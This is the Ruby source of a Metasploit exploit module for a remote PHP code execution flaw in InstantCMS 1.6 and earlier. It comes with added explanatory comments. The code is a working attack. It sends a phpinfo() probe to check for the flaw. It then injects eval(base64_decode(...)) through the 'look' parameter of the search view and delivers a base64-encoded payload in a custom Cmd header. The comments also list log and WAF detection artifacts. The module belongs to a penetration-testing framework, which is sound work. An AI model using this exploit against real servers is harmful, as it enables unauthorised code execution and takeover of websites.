
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/instantcms_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for InstantCMS 1.6: delivers an arbitrary PHP payload
# through the `search` view. The injection point is the `look` GET parameter, whose
# value is eval()'d server-side (see `exploit`); the payload itself travels in a
# custom `Cmd` request header, base64-encoded.
#
# Everything below is declarative framework DSL (update_info / register_options /
# send_request_cgi); the module has no state of its own.
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability rank used for module ordering and search.
  Rank = ExcellentRanking

  # Provides send_request_cgi, normalize_uri, target_uri and the RHOST/RPORT/SSL options.
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the single module-specific option.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
      'Description' => %q{
        This module exploits an arbitrary PHP command execution vulnerability because of a
        dangerous use of eval() in InstantCMS in versions 1.6 and prior.
      },
      'Author' =>
        [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'BID', '60816' ],
          [ 'PACKETSTORM', '122176' ]
        ],
      # The PHP payload runs inside the web server process; no elevated privileges are assumed.
      'Privileged' => false,
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' =>
        [
          [ 'InstantCMS 1.6', { } ],
        ],
      'DisclosureDate' => '2013-06-26',
      'DefaultTarget' => 0))

    # TARGETURI is the path of the InstantCMS front page; both `check` and `exploit`
    # append their GET parameters to it.
    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ])
  end

  # Vulnerability check.
  #
  # Sends a `${echo phpinfo()}` probe in the `query` parameter and reports Vulnerable
  # when the body contains "Build Date" (presumably a marker from phpinfo() output —
  # the page does not show the PHP side). Note that this is an active probe: it causes
  # the target to evaluate PHP, and the phpinfo() output is returned to the caller.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is seen, Safe otherwise
  #   (including when no response came back: `res` is guarded before `.body`).
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
        {
          'view' => 'search',
          'query' => '${echo phpinfo()}'
        }
    })

    if res and res.body.match(/Build Date/)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # Sends the single request that triggers payload execution.
  #
  # The `look` value starts with a random alpha string, then `","");` closes the
  # string/call the parameter is interpolated into, `eval(base64_decode($_SERVER[HTTP_CMD]))`
  # executes whatever the `Cmd` header carries, and `//` comments out the remainder.
  # `query` is random filler so the request does not depend on fixed content.
  #
  # NOTE(review): `res` is assigned but never inspected, so a failed or blocked request
  # is not reported here; success is only observable through the payload's own session.
  #
  # Detection-wise, the artifacts visible to a server log or WAF are exactly what this
  # request shape shows: `view=search` with `eval(`/`base64_decode(` in the `look`
  # parameter, plus a non-standard `Cmd` header carrying base64 data.
  def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.to_s),
      'vars_get' =>
        {
          'view' => 'search',
          'query' => rand_text_alpha(3 + rand(3)),
          'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
        },
      'headers' => {
        # payload.encoded is the framework-generated PHP; base64 keeps it header-safe.
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

  end
end